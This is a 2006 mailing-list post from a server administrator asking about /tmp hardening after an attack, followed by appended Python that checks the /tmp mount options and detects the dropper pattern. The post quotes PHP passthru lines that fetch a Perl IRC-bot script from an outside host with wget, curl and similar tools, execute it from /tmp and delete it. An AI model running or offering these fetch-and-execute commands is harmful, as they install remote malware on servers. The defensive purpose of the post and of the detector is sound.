Date:  Sat, 9 Sep 2006 16:44:31 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:06808] /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <200609052302609.SM00344@Virus>
X-Mail-Count: 06808

There was some discussion here lately about the security fix that stopped
programs from running in /TMP.  Is this configured by default if you have
your BQ Yum updated?  I got a DDOS today where the users were trying to run
the following program via PHP:

<?
 passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
v6.txt;rm -f v6*');
 passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl
v6.txt;rm -f v6*');
 passthru('cd /tmp;lwp-download
http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 ?>

The v6.txt is a Perl script that installs some IRC software and monitors IRC
on open ports.  I do not think the script was successful in running, but I
just want to make sure the /TMP security is enabled where files can't be run
there.  While I don't think the DDOS attack was successful in running the
script, it was successful in shutting down the server due to MySQL becoming
overwhelmed.  Server load was up to 156!

Any suggestions would be appreciated.
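An added check for the two questions raised above (is /tmp actually mounted so files can't be executed there, and is that dropper pattern sitting in any PHP on the box). This is example code, not part of the original post or of BlueQuartz; the mount table and PHP snippet it is run against are constructed samples with a placeholder hostname.

```python
import re

# Constructed sample in /proc/mounts format (not from the original post).
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda2 /home ext3 rw 0 0
"""

# Constructed PHP sample; the host name is a placeholder, not the one in the post.
SAMPLE_PHP = """<?php
$x = system("cd /tmp;wget http://EXAMPLE-HOST.invalid/v6.txt;perl v6.txt;rm -f v6*");
passthru('cd /tmp;curl -O http://EXAMPLE-HOST.invalid/v6.txt;perl v6.txt;rm -f v6*');
echo passthru('ls -l /var/log');
?>"""

REQUIRED = {"noexec", "nosuid", "nodev"}

def missing_tmp_options(mounts_text, mountpoint="/tmp"):
    """Return the hardening options missing on mountpoint, or None if
    mountpoint is not a separate mount at all (then noexec cannot apply)."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            return REQUIRED - set(fields[3].split(","))
    return None

# The dropper shape from the post: a shell-spawning PHP call whose string
# changes into a world-writable directory, fetches a file with any of the
# usual downloaders, then hands it to an interpreter.
DROPPER_RE = re.compile(
    r"\b(?:passthru|system|exec|shell_exec|popen|proc_open)\s*\(\s*['\"]"
    r"[^'\"]*\bcd\s+/(?:tmp|var/tmp|dev/shm)\b\s*;"
    r"[^'\"]*\b(?:wget|curl|lwp-download|lynx|fetch|GET)\b"
    r"[^'\"]*;\s*(?:perl|php|sh|bash|python)\b[^'\"]*['\"]\s*\)",
    re.IGNORECASE,
)

def find_dropper_calls(php_source):
    """Return each suspicious call as it appears in the source (wrapped
    lines inside the quoted string are matched too)."""
    return [m.group(0) for m in DROPPER_RE.finditer(php_source)]

if __name__ == "__main__":
    print("missing on /tmp:", missing_tmp_options(SAMPLE_MOUNTS))
    for call in find_dropper_calls(SAMPLE_PHP):
        print("dropper call:", call)
```

On a live box, feed `open("/proc/mounts").read()` to the first function and the contents of each .php file under the web root to the second; an empty set from the first means /tmp already carries all three options.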